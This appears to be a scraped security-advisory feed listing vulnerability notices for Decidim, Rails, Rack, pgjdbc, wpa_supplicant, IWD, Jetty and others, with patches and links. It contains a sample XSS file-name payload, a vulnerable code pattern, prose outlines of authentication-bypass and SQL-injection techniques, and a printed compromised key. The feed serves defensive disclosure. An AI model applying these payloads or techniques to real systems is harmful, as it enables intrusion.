The invites feature allows users to accept the invitation for an unlimited amount of time through the password reset functionality.

When using the password reset functionality, the `devise_invitable` gem always accepts the pending invitation if the user has been invited as shown in this piece of code within the `devise_invitable` gem:

https://github.com/scambra/devise_invitable/blob/41f58970ff76fb64382a9b9ea1bd530f7c3adab2/lib/devise_invitable/models.rb#L198

The only check done here is if the user has been invited but the code does not ensure that the pending invitation is still valid as defined by the `invite_for` expiry period as explained in the gem's documentation:

https://github.com/scambra/devise_invitable#model-configuration

> `invite_for`: The period the generated invitation token is valid. After this period, the invited resource won’t be able to accept the invitation. When `invite_for` is `0` (the default), the invitation won’t expire.

Decidim sets this configuration to `2.weeks` so this configuration should be respected:

https://github.com/decidim/decidim/blob/d2d390578050772d1bdb6d731395f1afc39dcbfc/decidim-core/config/initializers/devise.rb#L134

The bug is in the `devise_invitable` gem and should be fixed there and the dependency should be upgraded in Decidim once the fix becomes available.

### Patches

Update `devise_invitable` to version `2.0.9` or above by running the following command:

```
$ bundle update devise_invitable
```

### Workarounds

The invitations can be cancelled directly from the database by running the following command from the Rails console:

```
> Decidim::User.invitation_not_accepted.update_all(invitation_token: nil)
```

### References

OWASP ASVS V4.0.3-2.3.1

This bug has existed in the `devise_invitable` gem since this commit which was first included in the `v0.4.rc3` release of this gem:

https://github.com/scambra/devise_invitable/commit/94d859c7de0829bf63f679ae5dd3cab2b866a098

All versions since then are affected.

This gem was first introduced at its version `~> 1.7.0` to the `decidim-admin` gem in this commit which was first included in the `v0.0.1.alpha3` release of Decidim:

https://github.com/decidim/decidim/commit/073e60e2e4224dd81815a784002ebba30f2ebb34

It was first introduced at its version `~> 1.7.0` to the `decidim-system` gem in this commit which was also first included in the `v0.0.1.alpha3` release of Decidim:

https://github.com/decidim/decidim/commit/b12800717a689c295a9ea680a38ca9f823d2c454

### Credits

This issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-2023-48220

21.02.2024 23:06:26 | rubysec | [RUBYSEC:DECIDIM-2023-51447] Cross-site scripting (XSS) in the dynamic file uploads (medium)

### Impact

The dynamic file upload feature is subject to a potential XSS attack in case the attacker manages to modify the file names of the records being uploaded to the server.

This appears in sections where the user controls the file upload dialogs themselves and has the technical knowledge to change the file names through the dynamic upload endpoint. Therefore I believe it would require the attacker to control the whole session of the particular user but in any case, this needs to be fixed.

Successful exploit of this vulnerability would require the user to have successfully uploaded a file blob to the server with a malicious file name and then have the possibility to direct the other user to the edit page of the record where the attachment is attached.

The users are able to craft the direct upload requests themselves controlling the file name that gets stored to the database as shown here:

https://github.com/rails/rails/blob/a967d355c6fee9ad9b8bd115d43bc8b0fc207e7e/activestorage/app/controllers/active_storage/direct_uploads_controller.rb#L14

The attacker is able to change the filename e.g. to `<svg onload=alert('XSS')>` if they know how to craft these requests themselves. And then enter the returned blob ID to the form inputs manually by modifying the edit page source.

Therefore, anywhere we display these strings, we should properly escape them.

### Patches

PR #11612 fixes this problem both for 0.28.dev and 0.27.x.

### Workarounds

Disable dynamic uploads for the instance, e.g. from proposals.

### References

OWASP ASVS v4.0.3-5.1.3

### Credits

This issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-2023-51447

21.02.2024 23:06:26 | rubysec | [RUBYSEC:DEVISE_INVITABLE-2023-48220] Possibility to circumvent the invitation token expiry period (medium)

### Impact

The invites feature allows users to accept the invitation for an unlimited amount of time through the password reset functionality.

When using the password reset functionality, the `devise_invitable` gem always accepts the pending invitation if the user has been invited as shown in this piece of code within the `devise_invitable` gem:

https://github.com/scambra/devise_invitable/blob/41f58970ff76fb64382a9b9ea1bd530f7c3adab2/lib/devise_invitable/models.rb#L198

The only check done here is if the user has been invited but the code does not ensure that the pending invitation is still valid as defined by the `invite_for` expiry period as explained in the gem's documentation:

https://github.com/scambra/devise_invitable#model-configuration

> `invite_for`: The period the generated invitation token is valid. After this period, the invited resource won’t be able to accept the invitation. When `invite_for` is `0` (the default), the invitation won’t expire.

Decidim sets this configuration to `2.weeks` so this configuration should be respected:

https://github.com/decidim/decidim/blob/d2d390578050772d1bdb6d731395f1afc39dcbfc/decidim-core/config/initializers/devise.rb#L134

The bug is in the `devise_invitable` gem and should be fixed there and the dependency should be upgraded in Decidim once the fix becomes available.

### Patches

Update `devise_invitable` to version `2.0.9` or above by running the following command:

```
$ bundle update devise_invitable
```

### Workarounds

The invitations can be cancelled directly from the database by running the following command from the Rails console:

```
> Decidim::User.invitation_not_accepted.update_all(invitation_token: nil)
```

### References

OWASP ASVS V4.0.3-2.3.1

This bug has existed in the `devise_invitable` gem since this commit which was first included in the `v0.4.rc3` release of this gem:

https://github.com/scambra/devise_invitable/commit/94d859c7de0829bf63f679ae5dd3cab2b866a098

All versions since then are affected.

This gem was first introduced at its version `~> 1.7.0` to the `decidim-admin` gem in this commit which was first included in the `v0.0.1.alpha3` release of Decidim:

https://github.com/decidim/decidim/commit/073e60e2e4224dd81815a784002ebba30f2ebb34

It was first introduced at its version `~> 1.7.0` to the `decidim-system` gem in this commit which was also first included in the `v0.0.1.alpha3` release of Decidim:

https://github.com/decidim/decidim/commit/b12800717a689c295a9ea680a38ca9f823d2c454

### Credits

This issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DEVISE_INVITABLE-2023-48220

22.02.2024 01:18:26 | maven | [MAVEN:GHSA-XFG6-62PX-CXC2] Duplicate Advisory: SQL injection in pgjdbc (critical)

## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-24rp-q3w6-vc56. This link is maintained to preserve external references.

## Original Description

pgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query, bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.8 are affected.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XFG6-62PX-CXC2

22.02.2024 19:15:08 | alpinelinux | [ALPINE:CVE-2023-52160] wpa_supplicant vulnerability
[From CVE-2023-52160] The implementation of PEAP in wpa_supplicant through 2.10 allows authentication bypass. For a successful attack, wpa_supplicant must be configured to not verify the network's TLS certificate during Phase 1 authentication, and an eap_peap_decrypt vulnerability can then be abused to skip Phase 2 authentication. The attack vector is sending an EAP-TLV Success packet instead of starting Phase 2. This allows an adversary to impersonate Enterprise Wi-Fi networks.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-52160

22.02.2024 19:15:08 | alpinelinux | [ALPINE:CVE-2023-52161] iwd vulnerability
[From CVE-2023-52161] The Access Point functionality in eapol_auth_key_handle in eapol.c in iNet wireless daemon (IWD) before 2.14 allows attackers to gain unauthorized access to a protected Wi-Fi network. An attacker can complete the EAPOL handshake by skipping Msg2/4 and instead sending Msg4/4 with an all-zero key.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-52161

22.02.2024 15:15:07 | alpinelinux | [ALPINE:CVE-2023-3966] openvswitch vulnerability (high)
[From CVE-2023-3966] A flaw was found in Open vSwitch where multiple versions are vulnerable to crafted Geneve packets, which may result in a denial of service and invalid memory accesses. Triggering this issue requires that hardware offloading via the netlink path is enabled.
https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-3966

22.02.2024 05:11:39 | ubuntu | [USN-6649-1] Firefox vulnerabilities
Several security issues were fixed in Firefox.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6649-1

22.02.2024 03:12:32 | ubuntu | [USN-6648-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6648-1

22.02.2024 02:00:00 | cisa | [CISA-2024:0222] CISA Adds One Known Exploited Vulnerability to Catalog (critical)
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0222

22.02.2024 02:00:00 | debian | [DSA-5628-1] imagemagick (high)
security update
https://secdb.nttzen.cloud/security-advisory/debian/DSA-5628-1

22.02.2024 02:00:00 | redhat | [RHSA-2024:0950] postgresql:15 security update (important)

PostgreSQL is an advanced object-relational database management system (DBMS).

Security Fix(es):

* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0950

22.02.2024 02:00:00 | redhat | [RHSA-2024:0951] postgresql security update (important)

PostgreSQL is an advanced object-relational database management system (DBMS).

Security Fix(es):

* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0951

22.02.2024 02:00:00redhat[RHSA-2024:0952] firefox security update (important)Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.8.0 ESR.Security Fix(es):* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0952
22.02.2024 02:00:00freebsd[FREEBSD:03BF5157-D145-11EE-ACEE-001B217B3468] Gitlab -- Vulnerabilities (high)Gitlab reports: Stored-XSS in user's profile page; User with "admin_group_members" permission can invite other groups to gain owner access; ReDoS issue in the Codeowners reference extractor; LDAP user can reset password using secondary email and login using direct authentication; Bypassing group ip restriction settings to access environment details of projects through Environments/Operations Dashboard; Users with the Guest role can change Custom dashboard projects settings for projects in the victim group; Group member with sub-maintainer role can change title of shared private deploy keys; Bypassing approvals of CODEOWNERShttps://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:03BF5157-D145-11EE-ACEE-001B217B3468
22.02.2024 21:52:37almalinux[ALSA-2024:0888] edk2 security update (low)edk2 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0888
22.02.2024 21:10:16almalinux[ALSA-2024:0897] kernel security update (important)kernel security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0897
22.02.2024 22:03:22almalinux[ALSA-2024:0887] go-toolset:rhel8 security update (moderate)go-toolset:rhel8 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0887
22.02.2024 21:23:57almalinux[ALSA-2024:0893] python-pillow security update (important)python-pillow security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0893
22.02.2024 21:31:36almalinux[ALSA-2024:0889] oniguruma security update (moderate)oniguruma security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0889
22.02.2024 22:14:15almalinux[ALSA-2024:0861] gimp:2.8 security update (important)gimp:2.8 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0861
23.02.2024 23:40:59ubuntu[USN-6653-1] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6653-1
23.02.2024 22:20:01ubuntu[USN-6652-1] Linux kernel (Azure) vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6652-1
23.02.2024 21:36:52ubuntu[USN-6651-1] Linux kernel vulnerabilities (high)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6651-1
23.02.2024 20:57:31msrc[MS:CVE-2024-1676] Chromium: CVE-2024-1676 Inappropriate implementation in Navigationhttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1676
23.02.2024 20:57:29msrc[MS:CVE-2024-1675] Chromium: CVE-2024-1675 Insufficient policy enforcement in Downloadhttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1675
23.02.2024 20:57:27msrc[MS:CVE-2024-1674] Chromium: CVE-2024-1674 Inappropriate implementation in Navigationhttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1674
23.02.2024 20:57:25msrc[MS:CVE-2024-1673] Chromium: CVE-2024-1673 Use after free in Accessibilityhttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1673
23.02.2024 20:57:23msrc[MS:CVE-2024-1672] Chromium: CVE-2024-1672 Inappropriate implementation in Content Security Policyhttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1672
23.02.2024 20:57:21msrc[MS:CVE-2024-1671] Chromium: CVE-2024-1671 Inappropriate implementation in Site Isolationhttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1671
23.02.2024 20:57:19msrc[MS:CVE-2024-1670] Chromium: CVE-2024-1670 Use after free in Mojohttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1670
23.02.2024 20:57:15msrc[MS:CVE-2024-1669] Chromium: CVE-2024-1669 Out of bounds memory access in Blinkhttps://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1669
23.02.2024 23:41:20maven[MAVEN:GHSA-RC6H-QWJ9-2C53] Apache DolphinScheduler vulnerable to arbitrary JavaScript execution as root for authenticated users (critical)Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed JavaScript to be executed on the server.This issue is a legacy of CVE-2023-49299. We didn't fix it completely in CVE-2023-49299, and we added one more patch to fix it.This issue affects Apache DolphinScheduler: until 3.2.1.Users are recommended to upgrade to version 3.2.1, which fixes the issue.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RC6H-QWJ9-2C53
23.02.2024 21:43:21npm[NPM:GHSA-2FC9-XPP8-2G9H] `@backstage/backend-common` vulnerable to path traversal through symlinks (high)### ImpactPath checks with the `resolveSafeChildPath` utility were not exhaustive enough, leading to risk of path traversal vulnerabilities if symlinks can be injected by attackers.### PatchesPatched in `@backstage/backend-common` version `0.21.1`. Patched in `@backstage/backend-common` version `0.20.2`. Patched in `@backstage/backend-common` version `0.19.10`.### For more informationIf you have any questions or comments about this advisory: - Open an issue in the [Backstage repository](https://github.com/backstage/backstage) - Visit our Discord, linked to in [Backstage README](https://github.com/backstage/backstage)https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2FC9-XPP8-2G9H
23.02.2024 19:54:23ubuntu[USN-6650-1] Linux kernel (OEM) vulnerability (medium)The system could be made to crash under certain conditions.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6650-1
23.02.2024 10:00:00msrc[MS:CVE-2024-21423] Microsoft Edge (Chromium-based) Information Disclosure Vulnerability (low)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21423
23.02.2024 10:00:00msrc[MS:CVE-2024-26188] Microsoft Edge (Chromium-based) Spoofing Vulnerability (low)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26188
23.02.2024 10:00:00msrc[MS:CVE-2024-26192] Microsoft Edge (Chromium-based) Information Disclosure Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26192
23.02.2024 20:03:50maven[MAVEN:GHSA-CCGV-VJ62-XF9H] Spring Web vulnerable to Open Redirect or Server Side Request Forgery (high)Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect attack or to an SSRF attack if the URL is used after passing validation checks.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CCGV-VJ62-XF9H
23.02.2024 02:25:00amazonlinux[ALAS-2024-1922] Amazon Linux AMI 2014.03 - ALAS-2024-1922: important priority package update for sudo (important)https://secdb.nttzen.cloud/security-advisory/amazonlinux/ALAS-2024-1922
23.02.2024 02:00:00debian[DSA-5630-1] thunderbirdsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5630-1
23.02.2024 02:00:00debian[DSA-5629-1] chromiumsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5629-1
23.02.2024 02:00:00oraclelinux[ELSA-2024-0951] postgresql security update (important)[13.14-1.0.1]- Update to 13.14- Fixes CVE-2024-0985https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0951
23.02.2024 01:41:00amazonlinux[ALAS2-2024-2473] Amazon Linux 2 2017.12 - ALAS2-2024-2473: important priority package update for sudo (important)https://secdb.nttzen.cloud/security-advisory/amazonlinux/ALAS2-2024-2473
23.02.2024 02:00:00freebsd[FREEBSD:80AD6D6C-B398-457F-B88F-BF6BE0BBAD44] electron27 -- multiple vulnerabilities (critical)Electron developers report: This update fixes the following vulnerability: Security: backported fix for CVE-2024-1283. Security: backported fix for CVE-2024-1284.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:80AD6D6C-B398-457F-B88F-BF6BE0BBAD44
25.02.2024 01:18:32rubysec[RUBYSEC:ACTIONPACK-2024-26142] Possible ReDoS vulnerability in Accept header parsing in Action DispatchThere is a possible ReDoS vulnerability in the Accept header parsing routines of Action Dispatch. This vulnerability has been assigned the CVE identifier CVE-2024-26142. Versions Affected: >= 7.1.0, < 7.1.3.1 Not affected: < 7.1.0 Fixed Versions: 7.1.3.1# ImpactCarefully crafted Accept headers can cause Accept header parsing in Action Dispatch to take an unexpected amount of time, possibly resulting in a DoS vulnerability. All users running an affected release should either upgrade or use one of the workarounds immediately. Ruby 3.2 has mitigations for this problem, so Rails applications using Ruby 3.2 or newer are unaffected.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONPACK-2024-26142
25.02.2024 01:21:33rubysec[RUBYSEC:ACTIONPACK-2024-26143] Possible XSS Vulnerability in Action ControllerThere is a possible XSS vulnerability when using the translation helpers (`translate`, `t`, etc) in Action Controller. This vulnerability has been assigned the CVE identifier CVE-2024-26143. Versions Affected: All. Not affected: None Fixed Versions: 7.1.3.1, 7.0.8.1# ImpactApplications using translation methods like `translate`, or `t` on a controller, with a key ending in “_html”, a `:default` key which contains untrusted user input, and the resulting string is used in a view, may be susceptible to an XSS vulnerability. For example, impacted code will look something like this:
```ruby
class ArticlesController < ApplicationController
  def show
    @message = t("message_html", default: untrusted_input)
    # The `show` template displays the contents of `@message`
  end
end
```
To reiterate the pre-conditions, applications must:
* Use a translation function from a controller (i.e. *not* `I18n.t`, or `t` from a view)
* Use a key that ends in `_html`
* Use a default value where the default value is untrusted and unescaped input
* Send the text to the victim (whether that’s part of a template, or a `render` call)
All users running an affected release should either upgrade or use one of the workarounds immediately.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONPACK-2024-26143
25.02.2024 01:35:01rubysec[RUBYSEC:ACTIVESTORAGE-2024-26144] Possible Sensitive Session Information Leak in Active StorageThere is a possible sensitive session information leak in Active Storage. By default, Active Storage sends a `Set-Cookie` header along with the user’s session cookie when serving blobs. It also sets `Cache-Control` to public. Certain proxies may cache the `Set-Cookie`, leading to an information leak. This vulnerability has been assigned the CVE identifier CVE-2024-26144. Versions Affected: >= 5.2.0, < 7.1.0 Not affected: < 5.2.0, >= 7.1.0 Fixed Versions: 7.0.8.1, 6.1.7.7# ImpactA proxy which chooses to cache this request can cause users to share sessions. This may include a user receiving an attacker’s session or vice versa. This was patched in 7.1.0 but not previously identified as a security vulnerability. All users running an affected release should either upgrade or use one of the workarounds immediately.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsUpgrade to Rails 7.1.X, or configure caching proxies not to cache the `Set-Cookie` headers.https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIVESTORAGE-2024-26144
25.02.2024 01:30:24rubysec[RUBYSEC:RACK-2024-25126] Denial of Service Vulnerability in Rack Content-Type ParsingThere is a possible denial of service vulnerability in the content type parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2024-25126. Versions Affected: >= 0.4 Not affected: < 0.4 Fixed Versions: 3.0.9.1, 2.2.8.1# ImpactCarefully crafted content type headers can cause Rack’s media type parser to take much longer than expected, leading to a possible denial of service vulnerability. Impacted code will use Rack’s media type parser to parse content type headers. This code will look like below:
```ruby
request.media_type
## OR
request.media_type_params
## OR
Rack::MediaType.type(content_type)
```
Some frameworks (including Rails) call this code internally, so upgrading is recommended! All users running an affected release should either upgrade or use one of the workarounds immediately.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-25126
25.02.2024 01:36:44rubysec[RUBYSEC:RACK-2024-26141] Possible DoS Vulnerability with Range Header in RackThere is a possible DoS vulnerability relating to the Range request header in Rack. This vulnerability has been assigned the CVE identifier CVE-2024-26141. Versions Affected: >= 1.3.0. Not affected: < 1.3.0 Fixed Versions: 3.0.9.1, 2.2.8.1# ImpactCarefully crafted Range headers can cause a server to respond with an unexpectedly large response. Responding with such large responses could lead to a denial of service issue. Vulnerable applications will use the `Rack::File` middleware or the `Rack::Utils.byte_ranges` methods (this includes Rails applications).# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-26141
25.02.2024 01:43:17rubysec[RUBYSEC:RACK-2024-26146] Possible Denial of Service Vulnerability in Rack Header ParsingThere is a possible denial of service vulnerability in the header parsing routines in Rack. This vulnerability has been assigned the CVE identifier CVE-2024-26146. Versions Affected: All. Not affected: None Fixed Versions: 2.0.9.4, 2.1.4.4, 2.2.8.1, 3.0.9.1# ImpactCarefully crafted headers can cause header parsing in Rack to take longer than expected, resulting in a possible denial of service issue. `Accept` and `Forwarded` headers are impacted. Ruby 3.2 has mitigations for this problem, so Rack applications using Ruby 3.2 or newer are unaffected.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-26146
24.02.2024 02:00:00freebsd[FREEBSD:2A470712-D351-11EE-86BB-A8A1599412C6] chromium -- multiple security fixesChrome Releases reports: This update includes 12 security fixes: [41495060] High CVE-2024-1669: Out of bounds memory access in Blink. Reported by Anonymous on 2024-01-26 [41481374] High CVE-2024-1670: Use after free in Mojo. Reported by Cassidy Kim(@cassidy6564) on 2023-12-06 [41487933] Medium CVE-2024-1671: Inappropriate implementation in Site Isolation. Reported by Harry Chen on 2024-01-03 [41485789] Medium CVE-2024-1672: Inappropriate implementation in Content Security Policy. Reported by Georg Felber (TU Wien) & Marco Squarcina (TU Wien) on 2023-12-19 [41490491] Medium CVE-2024-1673: Use after free in Accessibility. Reported by Weipeng Jiang (@Krace) of VRI on 2024-01-11 [40095183] Medium CVE-2024-1674: Inappropriate implementation in Navigation. Reported by David Erceg on 2019-05-27 [41486208] Medium CVE-2024-1675: Insufficient policy enforcement in Download. Reported by Bartłomiej Wacko on 2023-12-21 [40944847] Low CVE-2024-1676: Inappropriate implementation in Navigation. Reported by Khalil Zhani on 2023-11-21https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:2A470712-D351-11EE-86BB-A8A1599412C6
25.02.2024 02:00:00debian[DSA-5631-1] iwdsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5631-1
26.02.2024 22:17:58slackware[SSA:2024-057-01] openjpeg (high)New openjpeg packages are available for Slackware 15.0 and -current to fix a security issue.**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/openjpeg-2.5.1-i586-1_slack15.0.txz: Upgraded.
  Fixed a heap-based buffer overflow in openjpeg in color.c:379:42 in sycc420_to_rgb when decompressing a crafted .j2k file. An attacker could use this to execute arbitrary code with the permissions of the application compiled against openjpeg.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2021-3575
  (* Security fix *)
```
**Where to find the new packages**Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/openjpeg-2.5.1-i586-1_slack15.0.txz
Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/openjpeg-2.5.1-x86_64-1_slack15.0.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/openjpeg-2.5.1-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/openjpeg-2.5.1-x86_64-1.txz
**MD5 signatures**
Slackware 15.0 package: b48dde1596a6bbd4ff17853d6305f5d9 openjpeg-2.5.1-i586-1_slack15.0.txz
Slackware x86_64 15.0 package: 953919aa0e6828dc2edff548e4643a10 openjpeg-2.5.1-x86_64-1_slack15.0.txz
Slackware -current package: 6ad0d352dbc55d1b5e3d5ffc0b518d41 l/openjpeg-2.5.1-i586-1.txz
Slackware x86_64 -current package: f4db01328ea44fa02c8bc8c31661f795 l/openjpeg-2.5.1-x86_64-1.txz
**Installation instructions**Upgrade the package as root: `# upgradepkg openjpeg-2.5.1-i586-1_slack15.0.txz`https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-057-01
27.02.2024 04:58:40maven[MAVEN:GHSA-RGGV-CV7R-MW98] Connection leaking on idle timeout when TCP congested (high)### ImpactIf an HTTP/2 connection gets TCP congested, when an idle timeout occurs the HTTP/2 session is marked as closed, and then a GOAWAY frame is queued to be written.However it is not written because the connection is TCP congested.When another idle timeout period elapses, it is then supposed to hard close the connection, but it delegates to the HTTP/2 session which reports that it has already been closed so it does not attempt to hard close the connection.This leaves the connection in ESTABLISHED state (i.e. not closed), TCP congested, and idle.An attacker can cause many connections to end up in this state, and the server may run out of file descriptors, eventually causing the server to stop accepting new connections from valid clients.The client may also be impacted (if the server does not read causing a TCP congestion), but the issue is more severe for servers.### PatchesPatched versions:* 9.4.54* 10.0.20* 11.0.20* 12.0.6### WorkaroundsDisable HTTP/2 and HTTP/3 support until you can upgrade to a patched version of Jetty.HTTP/1.x is not affected.### References* https://github.com/jetty/jetty.project/issues/11256.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RGGV-CV7R-MW98
26.02.2024 22:10:11npm[NPM:GHSA-84C3-J8R2-MCM8] @nfid/embed has compromised private key due to @dfinity/auth-client producing insecure session keys (critical)### ProblemUser sessions in the @nfid/embed SDK with Ed25519 keys are vulnerable due to a compromised private key `535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe`. This exposes users to potential loss of funds on ledgers and unauthorized access to canisters they control.### SolutionUsing version >1.0.1 of @dfinity/auth-client and @dfinity/identity packages, or @nfid/embed >0.10.1-alpha.6 includes patched versions of the issue.User sessions will be automatically fixed when they re-authenticate.### Why this happenedThe DFINITY auth client library provides a function, `Ed25519KeyIdentity.generate`, for generating an Ed25519 key pair. This function includes an optional parameter to supply a 32-byte seed value, which will be utilized as the secret key. In cases where no seed value is provided, the library is expected to generate the secret key using secure randomness. However, a recent update of DFINITY libraries has compromised this assurance by employing an insecure seed for key pair generation.### References[AgentJS CVE ](https://github.com/dfinity/agent-js/security/advisories/GHSA-c9vv-fhgv-cjc3)https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-84C3-J8R2-MCM8
